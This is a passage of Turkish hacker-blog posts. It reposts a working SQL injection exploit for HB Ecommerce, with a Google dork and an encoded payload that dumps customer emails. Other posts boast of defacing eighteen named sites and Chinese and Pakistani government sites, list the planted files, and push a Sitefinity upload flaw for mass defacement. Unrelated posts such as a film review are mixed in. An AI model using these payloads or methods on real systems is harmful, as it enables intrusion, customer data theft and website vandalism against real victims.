HB ECOMMERCE SQL Injection Vulnerability

Selamun aleyküm..
Exploit db`de yayınlanmış yeni bir vulnerability sizlere sunayım. Bir açıktır ecommerce `larda gidiyor dur bakalım, ne çıkacak. Açık 26/05 paylaşımlı, hem exploiti anlatalım hem de aldığım sonuçları sizlere vereyim deneyerek uğraşın.

-------------[ HB ECOMMERCE SQL Injection Vulnerability ]---------------
------------------------------------------------------------------------
------------------------------------------------------------------------
[+] Exploit Title: [ HB ECOMMERCE SQL Injection Vulnerability ]
[+] Google Dork: intext:'supplied by hb ecommerce'
[+] Date: 26.05.2011
[+] Author: takeshix
[+] Author Contact: takeshix@safe-mail.net
[+] Software Link: http://www.hbecommerce.co.uk/
[+] Tested on: Debian GNU/Linux Testing(Wheezy) x64
[+] System: PHP
------------------------------------------------------------------------
------------------------------------------------------------------------
vulnerable url:

/templates1/view_product.php?product=3D

Example:

http://localhost/templates1/view_product.php?product=3D[SQL INJECTION]

Get an Mail from the Customers Table:

http://localhost/templates1/view_product.php?product=3D94746%20AND%20%28SEL=

ECT%20716%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%28CHAR%2858%2C122%2C99%=
2C109%2C58%29%2C%28SELECT%20MID%28%28IFNULL%28CAST%28email%20AS%20CHAR%29%2=
CCHAR%2832%29%29%29%2C1%2C50%29%20FROM%20%60web34-hbecommerc%60.customers%2=
0LIMIT%205%2C1%29%2CCHAR%2858%2C109%2C103%2C100%2C58%29%2CFLOOR%28RAND%280%=
29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%2=
9a%29%20

note: customer passwords dumped in plaintext!

------------------------------------------------------------------------
------------------------------------------------------------------------
Greez to: esc0bar | Someone | takedown
------------------------------------------------------------------------
------------------------------------------------------------------------
--------------------------[ hacktivistas ]------------------------------

Google tarama sonuçlarımı indirmek için tıklayın.  
Rar Pass/Şifre: stproxy.wordpress.com

pr 2 server h4cked

Pr 2 Servera bir el attık. Barındırdığı sitelere imzamızı çaktık.
`o 1 Kr4L` hayırLı olsun..

18 site hacked of weiyucn.com\.

www.makandax.com/p.txt
rifeng.weiyucn.com/p.txt
ferox.weiyucn.com/p.txt
majie.weiyucn.com/p.txt
inax.weiyucn.com/p.txt
hpcc.weiyucn.com/p.txt
handy.weiyucn.com/p.txt
fabao.weiyucn.com/p.txt
eago.weiyucn.com/p.txt
dongtao.weiyucn.com/p.txt
hhhs.weiyucn.com/p.txt
builder.weiyucn.com/p.txt
forge.weiyucn.com/p.txt
vidar.weiyucn.com/p.txt
xinfei.weiyucn.com/p.txt
yunxiao.weiyucn.com/p.txt
milang.weiyucn.com/p.txt
ovs.weiyucn.com/p.txt

http://zero-h.com/ip=60.191.56.74

Bu IP e kayıtlı deface`lerdende takip edebilirsiniz.
.\Vesselam.. : )

“Sitefinity: Login” Vuln video anlatım

Selamun aleyküm..
Video çekmeyeli uzunca bir zaman ouş, dün bunu farkettim. Hazır bu sıralar yei yeni keşfedilen Sitefinity: Login açığını sizlere anlatmaya çalıştım. Açık /images klasörüne indeximizi .gif şeklinde atmamıza olanak sağlıyor. İlk sıralarda
“no permissions” yahut “Access Denied” hataları ile karşılaşabilirsiniz yılmayın iyi Scanner`lar ile elden geçirin bol bol site kasarsınız.

# Vuln: “Sitefinity: Login”
# Exploit: Sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx

# Video by: pr0xysn1ff3r
# Video Link: http://www.fileden.com/files/2011/3/26/3103613//siteinfinity.swf

Anlamadığınız yer olursa sorun

./Vesselam.

New York`ta Beş Minare izledim.

Selamun aleyküm..
Dün `New York`ta Beş Minare` sinema filmini TurkMax veriyordu izleme fırsatımda vardı izledim. Başarılı olmuş. Tek bir noktada sıkıntı gördüm, bi telefon konuşması geçiyordu Hacı ve marketi işleten yardımcısı arasında. FBI sizi sordu felan yerinizi söylemedim, ee kardeşim senin telefonun dinlenmiyor mu? Neden böyle işleri açıktan söylüyorsun (: Geri kalanı muhteşemdi. Domuz bağı, kafa kesme kısımları etkileyiciydi. Sonunda herşeyin açığa kavuşması sevindirdi beni, ama hüzünlü bitti orası ayrı. Tüm roller başarılı şekilde canlandırılmış, o sakallılar, milliyetçiler ve diğerleri helal olsun. Rolün hakkıı vermiş. Amarikalılarada söyleyecek sözümüz yok (: O David Berkır mı ne biraz sinirliydi biz türklere karşı, yumuşaması da iyi oldu. Ne diyim Mahsun abimiz yine yapmış yapacağını.

Beyaz melek olsun, bu filmi olsun beğenerek izledim. Yönetmenlik ayrı bir bakış açısı katmış, üstünede oturmuş gibi. Yeni projelerinide beklemiyor değiliz hani!  (:

birşeyler karaladık ps`de!

Selamun aleyküm..
İndex için yeni logo`lar peşindeydim. Kendimce birşeyler karalıyorum. Photoshop`un her deminden yararlaranarak yapığım birşey.Hoşuma gitti valla cins birşey oldu

`o 1 Kr4L` bundan böyle imzam bu…

gov.cn ve gov.pk uzantılara saldırı

gov.cn ve gov.pk uzantalı sitelere saldırı.5 Site indeximizi gördü, hayırlıara vesile olması ileğiyle. Böyle sitelerin, ufak tefek tırık açıklar barındırması utanç kaynağı domainlerine yazık .

http://zero-h.com/mirror/id/67624

http://zero-h.com/mirror/id/67625

http://zero-h.com/mirror/id/67626

http://zero-h.com/mirror/id/67627

http://zero-h.com/mirror/id/67628

.Vesselam (:

Gorukleatametemlak.Com Tarafımca uyarıldı

Selamun Aleyküm..
Aynı gün içerisinde uyarılarım devam ediyor.
Gorukleatametemlak.Com (Tr Web) tarafımca uyarılmıştır. Gerekli önlemleri almaları temennisiyle..

Uyarıya dair bir ekran görüntüsü..
(Resin Orjinal Boyutu için üzerine tıklayın.)